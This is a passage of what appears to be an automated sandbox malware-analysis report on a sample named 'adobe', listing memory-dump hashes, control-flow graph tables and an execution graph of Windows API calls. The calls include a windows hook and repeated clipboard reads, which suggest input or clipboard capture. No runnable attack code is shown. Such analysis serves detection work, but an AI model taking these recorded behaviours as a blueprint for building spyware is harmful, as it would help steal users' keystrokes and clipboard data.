                        • Instruction Fuzzy Hash: 4711BB75504280DFDB0ACF54D5C4B15BFA1FB85224F24C6AAD8494B296C33AD41ACB62
                        Memory Dump Source
                        • Source File: 00000003.00000002.1787568577.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_111d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 730c34051fb0cbee9e4d1ec7812709f9a8524e8426f3a08e80e737fd13972846
                        • Instruction ID: d9f2ab93e7d50ab86eb8d4063d1e3196153bc9eb37d83c3204916ceb4085f6fc
                        • Opcode Fuzzy Hash: 730c34051fb0cbee9e4d1ec7812709f9a8524e8426f3a08e80e737fd13972846
                        • Instruction Fuzzy Hash: F20120710087809AEB194A59ED88767FFD8DF41328F18C439ED084A25AC379D440C6B2
                        Memory Dump Source
                        • Source File: 00000003.00000002.1787568577.000000000111D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0111D000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_3_2_111d000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: d5bdb665f1e8a8857c25e7c04a39f3dc26e94db9bd98f2c148d1fb050454f44c
                        • Instruction ID: f524ee80806ed39f9b5fe7ce24b7a396a10a7a8e8cab74c5d77a47577e62122b
                        • Opcode Fuzzy Hash: d5bdb665f1e8a8857c25e7c04a39f3dc26e94db9bd98f2c148d1fb050454f44c
                        • Instruction Fuzzy Hash: 43F09C714047449EEB158A1ADCC8762FFA8EF51734F18C45AED084F396C3799844CBB1

                        Execution Graph

                        Execution Coverage:10.9%
                        Dynamic/Decrypted Code Coverage:100%
                        Signature Coverage:0%
                        Total number of Nodes:170
                        Total number of Limit Nodes:19
                        execution_graph 39241 688a2c8 39242 688a30c SetWindowsHookExA 39241->39242 39244 688a352 39242->39244 39415 6886a98 DuplicateHandle 39416 6886b2e 39415->39416 39245 6881dab 39246 6881db0 GetModuleHandleW 39245->39246 39248 6881e25 39246->39248 39417 106fb90 39418 106fba2 39417->39418 39420 106fc19 39418->39420 39421 106f2bc 39418->39421 39422 106f2c7 39421->39422 39426 6880f88 39422->39426 39432 6880f73 39422->39432 39423 106fdfa 39423->39420 39427 6880fb3 39426->39427 39428 6881062 39427->39428 39429 688039c GetModuleHandleW 39427->39429 39428->39428 39430 68810a6 39429->39430 39438 6882e0d 39430->39438 39433 6880fb3 39432->39433 39434 688039c GetModuleHandleW 39433->39434 39436 6881062 39433->39436 39435 68810a6 39434->39435 39437 6882e0d 2 API calls 39435->39437 39437->39436 39439 6882e11 39438->39439 39439->39428 39440 6882e52 CreateWindowExW 39439->39440 39444 6882e0d CreateWindowExW 39439->39444 39445 6882e58 39439->39445 39442 6882f7c 39440->39442 39442->39442 39444->39439 39446 6882ec0 CreateWindowExW 39445->39446 39448 6882f7c 39446->39448 39249 68884e0 39250 68884eb 39249->39250 39251 68884fb 39250->39251 39253 6886834 39250->39253 39254 6888530 OleInitialize 39253->39254 39255 6888594 39254->39255 39255->39251 39256 6887c20 39257 6887c28 39256->39257 39259 6887c4b 39257->39259 39260 68866ec 39257->39260 39261 6887c60 KiUserCallbackDispatcher 39260->39261 39263 6887cce 39261->39263 39263->39257 39264 fdd030 39265 fdd048 39264->39265 39266 fdd0a2 39265->39266 39273 688170c 39265->39273 39281 6883003 39265->39281 39287 6883010 39265->39287 39293 688313f 39265->39293 39297 688769f 39265->39297 39305 68816fc 39265->39305 39274 6881717 39273->39274 39275 6887701 39274->39275 39277 68876f1 39274->39277 39321 6886694 39275->39321 39309 6887828 39277->39309 39315 6887818 39277->39315 39278 68876ff 39286 6883010 39281->39286 39282 68816fc GetModuleHandleW 39283 6883042 39282->39283 39284 688170c 2 API calls 39283->39284 39285 6883057 39284->39285 39285->39266 39286->39282 39292 6883036 39287->39292 39288 68816fc GetModuleHandleW 39289 6883042 39288->39289 39290 688170c 2 API calls 39289->39290 39291 6883057 39290->39291 39291->39266 39292->39288 39294 6883140 39293->39294 39384 6881734 39294->39384 39296 6883147 39296->39266 39298 68876a0 39297->39298 39299 6887701 39298->39299 39301 68876f1 39298->39301 39300 6886694 2 API calls 39299->39300 39302 68876ff 39300->39302 39303 6887818 2 API calls 39301->39303 39304 6887828 2 API calls 39301->39304 39303->39302 39304->39302 39306 6881707 39305->39306 39307 6881734 GetModuleHandleW 39306->39307 39308 6883147 39307->39308 39308->39266 39310 6887836 39309->39310 39311 6886694 2 API calls 39310->39311 39312 688790e 39310->39312 39328 6887d00 39310->39328 39333 6887cf1 39310->39333 39311->39310 39312->39278 39317 6887828 39315->39317 39316 6886694 2 API calls 39316->39317 39317->39316 39318 688790e 39317->39318 39319 6887d00 OleGetClipboard 39317->39319 39320 6887cf1 OleGetClipboard 39317->39320 39318->39278 39319->39317 39320->39317 39322 688669f 39321->39322 39323 688796a 39322->39323 39324 6887a14 39322->39324 39326 68879c2 CallWindowProcW 39323->39326 39327 6887971 39323->39327 39325 688170c OleGetClipboard 39324->39325 39325->39327 39326->39327 39327->39278 39329 6887d1f 39328->39329 39330 6887d8a 39329->39330 39338 6888298 39329->39338 39344 68882c0 39329->39344 39330->39310 39334 6887cf6 39333->39334 39335 6887ce6 39334->39335 39336 6888298 OleGetClipboard 39334->39336 39337 68882c0 OleGetClipboard 39334->39337 39335->39310 39336->39334 39337->39334 39340 688829d 39338->39340 39339 6888215 39339->39329 39340->39339 39350 6888308 39340->39350 39361 68882fa 39340->39361 39341 68882f1 39341->39329 39346 68882c8 39344->39346 39345 68882dc 39345->39329 39346->39345 39348 6888308 OleGetClipboard 39346->39348 39349 68882fa OleGetClipboard 39346->39349 39347 68882f1 39347->39329 39348->39347 39349->39347 39351 688831a 39350->39351 39352 6888335 39351->39352 39354 6888379 39351->39354 39357 6888308 OleGetClipboard 39352->39357 39358 68882fa OleGetClipboard 39352->39358 39353 688833b 39353->39341 39356 68883f9 39354->39356 39372 68885c0 39354->39372 39376 68885d0 39354->39376 39355 6888417 39355->39341 39356->39341 39357->39353 39358->39353 39362 6888302 39361->39362 39363 6888335 39362->39363 39365 6888379 39362->39365 39368 6888308 OleGetClipboard 39363->39368 39369 68882fa OleGetClipboard 39363->39369 39364 688833b 39364->39341 39367 68883f9 39365->39367 39370 68885c0 OleGetClipboard 39365->39370 39371 68885d0 OleGetClipboard 39365->39371 39366 6888417 39366->39341 39367->39341 39368->39364 39369->39364 39370->39366 39371->39366 39374 68885d0 39372->39374 39375 688860b 39374->39375 39380 68880a8 39374->39380 39375->39355 39378 68885e5 39376->39378 39377 68880a8 OleGetClipboard 39377->39378 39378->39377 39379 688860b 39378->39379 39379->39355 39381 6888678 OleGetClipboard 39380->39381 39383 6888712 39381->39383 39385 688173f 39384->39385 39387 6883217 39385->39387 39388 688039c 39385->39388 39389 6881db0 GetModuleHandleW 39388->39389 39391 6881e25 39389->39391 39391->39387 39392 1060848 39394 106084e 39392->39394 39393 106091b 39394->39393 39396 106134f 39394->39396 39397 1061353 39396->39397 39398 106147a 39397->39398 39400 1068219 39397->39400 39398->39394 39401 1068223 39400->39401 39402 10682d9 39401->39402 39405 689f8d9 39401->39405 39410 689f8e8 39401->39410 39402->39397 39407 689f8fd 39405->39407 39406 689fb12 39406->39402 39407->39406 39408 689fd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 39407->39408 39409 689fb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 39407->39409 39408->39407 39409->39407 39412 689f8fd 39410->39412 39411 689fb12 39411->39402 39412->39411 39413 689fd84 GlobalMemoryStatusEx GlobalMemoryStatusEx 39412->39413 39414 689fb27 GlobalMemoryStatusEx GlobalMemoryStatusEx 39412->39414 39413->39412 39414->39412

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 125 6893418-6893439 126 689343b-689343e 125->126 127 6893440-689345f 126->127 128 6893464-6893467 126->128 127->128 129 6893c08-6893c0a 128->129 130 689346d-689348c 128->130 132 6893c0c 129->132 133 6893c11-6893c14 129->133 138 689348e-6893491 130->138 139 68934a5-68934af 130->139 132->133 133->126 135 6893c1a-6893c23 133->135 138->139 140 6893493-68934a3 138->140 142 68934b5-68934c4 139->142 140->142 254 68934c6 call 6893c38 142->254 255 68934c6 call 6893c30 142->255 144 68934cb-68934d0 145 68934dd-68937ba 144->145 146 68934d2-68934d8 144->146 167 6893bfa-6893c07 145->167 168 68937c0-689386f 145->168 146->135 177 6893898 168->177 178 6893871-6893896 168->178 180 68938a1-68938b4 call 6892368 177->180 178->180 183 68938ba-68938dc call 6892374 180->183 184 6893be1-6893bed 180->184 183->184 188 68938e2-68938ec 183->188 184->168 185 6893bf3 184->185 185->167 188->184 189 68938f2-68938fd 188->189 189->184 190 6893903-68939d9 189->190 202 68939db-68939dd 190->202 203 68939e7-6893a17 190->203 202->203 207 6893a19-6893a1b 203->207 208 6893a25-6893a31 203->208 207->208 209 6893a91-6893a95 208->209 210 6893a33-6893a37 208->210 212 6893a9b-6893ad7 209->212 213 6893bd2-6893bdb 209->213 210->209 211 6893a39-6893a63 210->211 220 6893a71-6893a8e call 6892380 211->220 221 6893a65-6893a67 211->221 224 6893ad9-6893adb 212->224 225 6893ae5-6893af3 212->225 213->184 213->190 220->209 221->220 224->225 228 6893b0a-6893b15 225->228 229 6893af5-6893b00 225->229 233 6893b2d-6893b3e 228->233 234 6893b17-6893b1d 228->234 229->228 232 6893b02 229->232 232->228 238 6893b40-6893b46 233->238 239 6893b56-6893b62 233->239 235 6893b1f 234->235 236 6893b21-6893b23 234->236 235->233 236->233 240 6893b48 238->240 241 6893b4a-6893b4c 238->241 243 6893b7a-6893bcb 239->243 244 6893b64-6893b6a 239->244 240->239 241->239 243->213 245 6893b6c 244->245 246 6893b6e-6893b70 244->246 245->243 246->243 254->144 255->144
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-2392861976
                        • Opcode ID: 635f7d038e3541626b0d10c0ea97fbefbf5e7b5a6d62f10dfe7b638493013dcd
                        • Instruction ID: 75fc5610d1765d890e596a6d18211a97fd56abdb37bb3b7fa09b3bd5de19afd4
                        • Opcode Fuzzy Hash: 635f7d038e3541626b0d10c0ea97fbefbf5e7b5a6d62f10dfe7b638493013dcd
                        • Instruction Fuzzy Hash: 37321E31E1061ACFCF54EF79C89459DB7B6FF89300F14C6A9D449AB224EB30A985CB91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 798 6897cf8-6897d16 799 6897d18-6897d1b 798->799 800 6897d1d-6897d39 799->800 801 6897d3e-6897d41 799->801 800->801 802 6897d4e-6897d51 801->802 803 6897d43-6897d4d 801->803 805 6897d68-6897d6b 802->805 806 6897d53-6897d61 802->806 807 6897d6d-6897d87 805->807 808 6897d8c-6897d8e 805->808 813 6897d9e-6897db4 806->813 814 6897d63 806->814 807->808 811 6897d90 808->811 812 6897d95-6897d98 808->812 811->812 812->799 812->813 818 6897dba-6897dc3 813->818 819 6897fcf-6897fd9 813->819 814->805 820 6897dc9-6897de6 818->820 821 6897fda-689800f 818->821 830 6897fbc-6897fc9 820->830 831 6897dec-6897e14 820->831 824 6898011-6898014 821->824 826 689801a-6898026 824->826 827 68980c1-68980c4 824->827 834 6898031-6898033 826->834 828 68980e7-68980ea 827->828 829 68980c6-68980e2 827->829 832 689831f-6898321 828->832 833 68980f0-68980ff 828->833 829->828 830->818 830->819 831->830 854 6897e1a-6897e23 831->854 836 6898328-689832b 832->836 837 6898323 832->837 849 689811e-6898162 833->849 850 6898101-689811c 833->850 839 689804b-689804f 834->839 840 6898035-689803b 834->840 836->824 846 6898331-689833a 836->846 837->836 843 689805d 839->843 844 6898051-689805b 839->844 841 689803d 840->841 842 689803f-6898041 840->842 841->839 842->839 847 6898062-6898064 843->847 844->847 852 689807b-68980b4 847->852 853 6898066-6898069 847->853 858 6898168-6898179 849->858 859 68982f3-6898309 849->859 850->849 852->833 877 68980b6-68980c0 852->877 853->846 854->821 857 6897e29-6897e45 854->857 864 6897e4b-6897e75 857->864 865 6897faa-6897fb6 857->865 869 689817f-689819c 858->869 870 68982de-68982ed 858->870 859->832 881 6897e7b-6897ea3 864->881 882 6897fa0-6897fa5 864->882 865->830 865->854 869->870 880 68981a2-6898298 call 6896510 869->880 870->858 870->859 931 689829a-68982a4 880->931 932 68982a6 880->932 881->882 889 6897ea9-6897ed7 881->889 882->865 889->882 894 6897edd-6897ee6 889->894 894->882 895 6897eec-6897f1e 894->895 903 6897f29-6897f45 895->903 904 6897f20-6897f24 895->904 903->865 907 6897f47-6897f9e call 6896510 903->907 904->882 906 6897f26 904->906 906->903 907->865 933 68982ab-68982ad 931->933 932->933 933->870 934 68982af-68982b4 933->934 935 68982c2 934->935 936 68982b6-68982c0 934->936 937 68982c7-68982c9 935->937 936->937 937->870 938 68982cb-68982d7 937->938 938->870
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q
                        • API String ID: 0-355816377
                        • Opcode ID: 324b3ae4a5f3c6bf19ea01a2ed174cd54d2b831192fdbb32ee1aea9a44f9ec1e
                        • Instruction ID: e1482109ca642a057821b9aee3e37456a8c975d3e39ee3670cf61dab39a85073
                        • Opcode Fuzzy Hash: 324b3ae4a5f3c6bf19ea01a2ed174cd54d2b831192fdbb32ee1aea9a44f9ec1e
                        • Instruction Fuzzy Hash: 1A029E30B1021A8FDF54DB65D9806AEB7E2FF85304F188929E509DB395EB31EC46CB91
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 232167f44ce3d759b075e001a334f0c6d37484be1dddeea67a62443b97d5fa42
                        • Instruction ID: 11efa5268b81ea94247b8c6e8e7b33ac55ee746cc3d38e95979e712fbd2b7647
                        • Opcode Fuzzy Hash: 232167f44ce3d759b075e001a334f0c6d37484be1dddeea67a62443b97d5fa42
                        • Instruction Fuzzy Hash: 91929734E002049FDFA4CB68C594A5DB7F2FB48314F5884A9D549EB361DB35ED85CBA0
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 992ec84a0751756f0fb0e4d22585858620d203db81b0d42048bf5cdc1d223b00
                        • Instruction ID: 96fc2755373e597b53bc79198fbaa37e8e4d9993656e1333188f28113d078d9e
                        • Opcode Fuzzy Hash: 992ec84a0751756f0fb0e4d22585858620d203db81b0d42048bf5cdc1d223b00
                        • Instruction Fuzzy Hash: 3F62D130B002159FEF54DB68D594AADB7F2EF88314F188429E505EB354EB35EC86CBA1
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e74deb82beb8868402d81445402ccd54150c84a0f988aebb3c6771f9048d70e
                        • Instruction ID: d4619fcf89593d77f4e2e72a765f87d3ea0470a586c44e0ef786dab19ad457af
                        • Opcode Fuzzy Hash: 0e74deb82beb8868402d81445402ccd54150c84a0f988aebb3c6771f9048d70e
                        • Instruction Fuzzy Hash: 5132B234B002198FDF54DB68D990BAEB7B2FB88310F248529E505EB355DB35EC46CBA1
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 3f51bf335aecadae1681fcddf1ab67864f7760fe33bb5884f174c64a47ee7b58
                        • Instruction ID: d3f8864450840bdca7540e7c1be4a9f9850a858a893848db1b7e086abe8a8941
                        • Opcode Fuzzy Hash: 3f51bf335aecadae1681fcddf1ab67864f7760fe33bb5884f174c64a47ee7b58
                        • Instruction Fuzzy Hash: 8E12F331F002059FDF669F64D8907AEB7B2EB85310F188829DA4ADB345DB34DD45CBA2
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: c70cbc3dae461a3a0724e08a45b041e5230b447c7c0f6e589207232830488d0f
                        • Instruction ID: f1ab5efb8ed8d39def4c539bfe1d7a6477d5db995ea3e91d2d95d8be02b42ac0
                        • Opcode Fuzzy Hash: c70cbc3dae461a3a0724e08a45b041e5230b447c7c0f6e589207232830488d0f
                        • Instruction Fuzzy Hash: BA227530E102099FDF64DBA8E5807AFB7B2FB89310F288925E555E7351D635DC81CB61

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 0 689ac40-689ac5e 1 689ac60-689ac63 0->1 2 689ac73-689ac76 1->2 3 689ac65-689ac6e 1->3 4 689ac99-689ac9c 2->4 5 689ac78-689ac94 2->5 3->2 6 689ac9e-689acb1 4->6 7 689acb6-689acb9 4->7 5->4 6->7 9 689acbb-689acc8 7->9 10 689accd-689acd0 7->10 9->10 12 689acda-689acdd 10->12 13 689acd2-689acd7 10->13 15 689acdf-689ace8 12->15 16 689acf7-689acfa 12->16 13->12 18 689acee-689acf2 15->18 19 689ae77-689aeae 15->19 20 689ae5d-689ae66 16->20 21 689ad00-689ad03 16->21 18->16 30 689aeb0-689aeb3 19->30 20->15 22 689ae6c-689ae76 20->22 23 689ad05-689ad09 21->23 24 689ad14-689ad16 21->24 23->22 25 689ad0f 23->25 26 689ad18 24->26 27 689ad1d-689ad20 24->27 25->24 26->27 27->1 29 689ad26-689ad4a 27->29 46 689ae5a 29->46 47 689ad50-689ad5f 29->47 31 689aec0-689aec3 30->31 32 689aeb5-689aeb9 30->32 33 689aec5-689aee1 31->33 34 689aee6-689aee9 31->34 36 689aebb 32->36 37 689aeef-689af2a 32->37 33->34 34->37 38 689b152-689b155 34->38 36->31 48 689b11d-689b130 37->48 49 689af30-689af3c 37->49 39 689b162-689b165 38->39 40 689b157-689b161 38->40 44 689b174-689b176 39->44 45 689b167 call 689b198 39->45 51 689b178 44->51 52 689b17d-689b180 44->52 54 689b16d-689b16f 45->54 46->20 58 689ad61-689ad67 47->58 59 689ad77-689adb2 call 6896510 47->59 53 689b132-689b133 48->53 60 689af5c-689afa0 49->60 61 689af3e-689af57 49->61 51->52 52->30 56 689b186-689b190 52->56 53->38 54->44 63 689ad69 58->63 64 689ad6b-689ad6d 58->64 76 689adca-689ade1 59->76 77 689adb4-689adba 59->77 78 689afbc-689affb 60->78 79 689afa2-689afb4 60->79 61->53 63->59 64->59 91 689adf9-689ae0a 76->91 92 689ade3-689ade9 76->92 80 689adbc 77->80 81 689adbe-689adc0 77->81 85 689b001-689b0dc call 6896510 78->85 86 689b0e2-689b0f7 78->86 79->78 80->76 81->76 85->86 86->48 98 689ae0c-689ae12 91->98 99 689ae22-689ae53 91->99 94 689adeb 92->94 95 689aded-689adef 92->95 94->91 95->91 100 689ae14 98->100 101 689ae16-689ae18 98->101 99->46 100->99 101->99
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-3823777903
                        • Opcode ID: c151a30e836dd7e8a2b2b8cacd906bedbc39123ec8085df16e92e23b829db707
                        • Instruction ID: 0dcf55477c15760e5881043c065a032d85cc1644ecb08c8f69a211c73920769e
                        • Opcode Fuzzy Hash: c151a30e836dd7e8a2b2b8cacd906bedbc39123ec8085df16e92e23b829db707
                        • Instruction Fuzzy Hash: 80E16D30E0020A8FDF69DF69D9906AEB7B2FF85304F248529D505DB354DB71E846CB91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 256 689b5c0-689b5e2 257 689b5e4-689b5e7 256->257 258 689b5e9-689b5ed 257->258 259 689b5fe-689b601 257->259 260 689b95f-689b996 258->260 261 689b5f3-689b5f9 258->261 262 689b611-689b614 259->262 263 689b603-689b60c 259->263 271 689b998-689b99b 260->271 261->259 264 689b61a-689b61d 262->264 265 689b80c-689b80f 262->265 263->262 267 689b61f-689b622 264->267 268 689b627-689b62a 264->268 269 689b71c-689b71f 265->269 270 689b815 265->270 267->268 272 689b63a-689b63d 268->272 273 689b62c-689b633 268->273 269->260 274 689b725-689b72c 269->274 275 689b81a-689b81d 270->275 280 689b9a1-689b9c9 271->280 281 689bc07-689bc0a 271->281 278 689b67c-689b67f 272->278 279 689b63f-689b654 272->279 273->263 282 689b635 273->282 283 689b731-689b734 274->283 276 689b81f-689b824 275->276 277 689b827-689b82a 275->277 276->277 288 689b82c-689b889 call 6896510 277->288 289 689b88e-689b891 277->289 290 689b681-689b685 278->290 291 689b696-689b699 278->291 279->260 308 689b65a-689b677 279->308 346 689b9cb-689b9ce 280->346 347 689b9d3-689ba17 280->347 286 689bc2d-689bc2f 281->286 287 689bc0c-689bc28 281->287 282->272 284 689b744-689b747 283->284 285 689b736-689b73f 283->285 292 689b749-689b74b 284->292 293 689b74e-689b751 284->293 285->284 298 689bc31 286->298 299 689bc36-689bc39 286->299 287->286 288->289 294 689b753-689b754 289->294 295 689b897-689b89a 289->295 290->260 300 689b68b-689b691 290->300 301 689b69b-689b6a1 291->301 302 689b6a6-689b6a9 291->302 292->293 293->294 306 689b759-689b75c 293->306 294->306 303 689b8d8-689b8db 295->303 304 689b89c-689b8b1 295->304 298->299 299->271 309 689bc3f-689bc48 299->309 300->291 301->302 310 689b6b9-689b6bc 302->310 311 689b6ab-689b6b4 302->311 303->294 316 689b8e1-689b8e4 303->316 304->260 336 689b8b7-689b8d3 304->336 314 689b75e-689b762 306->314 315 689b783-689b786 306->315 308->278 317 689b7a2-689b7ab 310->317 318 689b6c2-689b6c5 310->318 311->310 314->260 329 689b768-689b778 314->329 330 689b788-689b78c 315->330 331 689b79d-689b7a0 315->331 324 689b907-689b90a 316->324 325 689b8e6-689b8ea 316->325 319 689b7ad 317->319 320 689b7d7-689b7e0 317->320 321 689b6ec-689b6ef 318->321 322 689b6c7-689b6cb 318->322 332 689b7b2-689b7b5 319->332 320->260 337 689b7e6-689b7ed 320->337 334 689b6f1-689b70d 321->334 335 689b712-689b715 321->335 322->260 333 689b6d1-689b6e1 322->333 340 689b92c-689b92f 324->340 341 689b90c-689b927 324->341 325->260 339 689b8ec-689b8fc 325->339 329->322 362 689b77e 329->362 330->260 342 689b792-689b798 330->342 331->317 331->332 343 689b7c5-689b7c8 332->343 344 689b7b7-689b7c0 332->344 333->325 365 689b6e7 333->365 334->335 335->294 348 689b717-689b71a 335->348 336->303 345 689b7f2-689b7f5 337->345 339->294 367 689b902 339->367 349 689b931-689b93d 340->349 350 689b942-689b944 340->350 341->340 342->331 354 689b7ca-689b7cd 343->354 355 689b7d2-689b7d5 343->355 344->343 358 689b807-689b80a 345->358 359 689b7f7 345->359 346->309 378 689ba1d-689ba26 347->378 379 689bbfc-689bc06 347->379 348->269 348->283 349->350 363 689b94b-689b94e 350->363 364 689b946 350->364 354->355 355->320 355->345 358->265 358->275 372 689b7ff-689b802 359->372 362->315 363->257 370 689b954-689b95e 363->370 364->363 365->321 367->324 372->358 381 689ba2c-689ba98 call 6896510 378->381 382 689bbf2-689bbf7 378->382 390 689ba9e-689baa3 381->390 391 689bb92-689bba7 381->391 382->379 393 689babf 390->393 394 689baa5-689baab 390->394 391->382 395 689bac1-689bac7 393->395 396 689baad-689baaf 394->396 397 689bab1-689bab3 394->397 399 689bac9-689bacf 395->399 400 689badc-689bae9 395->400 398 689babd 396->398 397->398 398->395 401 689bb7d-689bb8c 399->401 402 689bad5 399->402 407 689baeb-689baf1 400->407 408 689bb01-689bb0e 400->408 401->390 401->391 402->400 403 689bb10-689bb1d 402->403 404 689bb44-689bb51 402->404 414 689bb1f-689bb25 403->414 415 689bb35-689bb42 403->415 416 689bb69-689bb76 404->416 417 689bb53-689bb59 404->417 409 689baf3 407->409 410 689baf5-689baf7 407->410 408->401 409->408 410->408 418 689bb29-689bb2b 414->418 419 689bb27 414->419 415->401 416->401 420 689bb5b 417->420 421 689bb5d-689bb5f 417->421 418->415 419->415 420->416 421->416
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q$$^q$$^q
                        • API String ID: 0-2392861976
                        • Opcode ID: 9d72f83646baa95518afa7238d7ea7ab3294ac8b65ea8c4205617681312faec4
                        • Instruction ID: c23a25a10959482640a2ea594e54c1e67d94daf2c5d2902d43ea5f0fbc5d52bd
                        • Opcode Fuzzy Hash: 9d72f83646baa95518afa7238d7ea7ab3294ac8b65ea8c4205617681312faec4
                        • Instruction Fuzzy Hash: 1F029F30E0020A8FDF64DF68E5806AEB7B2FB85314F18892AD515DB355DB71EC85CBA1

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 424 68990c8-68990ed 425 68990ef-68990f2 424->425 426 68990f8-689910d 425->426 427 68999b0-68999b3 425->427 433 689910f-6899115 426->433 434 6899125-689913b 426->434 428 68999d9-68999db 427->428 429 68999b5-68999d4 427->429 431 68999dd 428->431 432 68999e2-68999e5 428->432 429->428 431->432 432->425 435 68999eb-68999f5 432->435 437 6899119-689911b 433->437 438 6899117 433->438 441 6899146-6899148 434->441 437->434 438->434 442 689914a-6899150 441->442 443 6899160-68991d1 441->443 444 6899152 442->444 445 6899154-6899156 442->445 454 68991fd-6899219 443->454 455 68991d3-68991f6 443->455 444->443 445->443 460 689921b-689923e 454->460 461 6899245-6899260 454->461 455->454 460->461 466 689928b-68992a6 461->466 467 6899262-6899284 461->467 472 68992a8-68992c4 466->472 473 68992cb-68992d9 466->473 467->466 472->473 474 68992e9-6899363 473->474 475 68992db-68992e4 473->475 481 68993b0-68993c5 474->481 482 6899365-6899383 474->482 475->435 481->427 486 689939f-68993ae 482->486 487 6899385-6899394 482->487 486->481 486->482 487->486
                        Strings
                        Memory Dump Source
                        • Source File: 00000004.00000002.1886458924.0000000006890000.00000040.00000800.00020000.00000000.sdmp, Offset: 06890000, based on PE: false
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_4_2_6890000_adobe.jbxd
                        Similarity
                        • API ID:
                        • String ID: $^q$$^q$$^q$$^q
                        • API String ID: 0-2125118731
                        • Opcode ID: 92edf2346cc1fdee32fe96f0928b447a46c133e833a0de72cacc87278cd2257a
                        • Instruction ID: ea4ef823d468cb23873e5a70ca38201a7a18813c1e1f1d191a596d0c8413297c
                        • Opcode Fuzzy Hash: 92edf2346cc1fdee32fe96f0928b447a46c133e833a0de72cacc87278cd2257a
                        • Instruction Fuzzy Hash: 94916E30B0061A9FDF54DF65D9507AEB3F6BFC9204F188569D509EB388EB70AC428B91

                        Control-flow Graph

                        • Executed
                        • Not Executed
                        control_flow_graph 490 689cec8-689cee3 491 689cee5-689cee8 490->491 492 689ceea-689ceef 491->492 493 689cef2-689cef5 491->493 492->493 494 689cf3e-689cf41 493->494 495 689cef7-689cf39 493->495 496 689cf8a-689cf8d 494->496 497 689cf43-689cf85 494->497 495->494 499 689cf8f-689cfd1 496->499 500 689cfd6-689cfd9 496->500 497->496 499->500 502 689cfe8-689cfeb 500->502 503 689cfdb-689cfdd 500->503 508 689cfed-689d02f 502->508 509 689d034-689d037 502->509 506 689d26f-689d278 503->506 507 689cfe3 503->507 513 689d27a-689d27f 506->513 514 689d287-689d293 506->514 507->502 508->509 511 689d039-689d07b 509->511 512 689d080-689d083 509->512 511->512 519 689d0cc-689d0cf 512->519 520 689d085-689d0c7 512->520 513->514 515 689d299-689d2ad 514->515 516 689d3a4-689d3a9 514->516 534 689d3b1 515->534 535 689d2b3-689d2c5 515->535 516->534 522 689d118-689d11b 519->522 523 689d0d1-689d113 519->523 520->519 531 689d121-689d124 522->531 532 689d3b4-689d3c0 522->532 523->522 541 689d147-689d14a 531->541 542 689d126-689d142 531->542 537 689d14c-689d15b 532->537 538 689d3c6-689d6b3 532->538 534->532 562 689d2e9-689d2eb 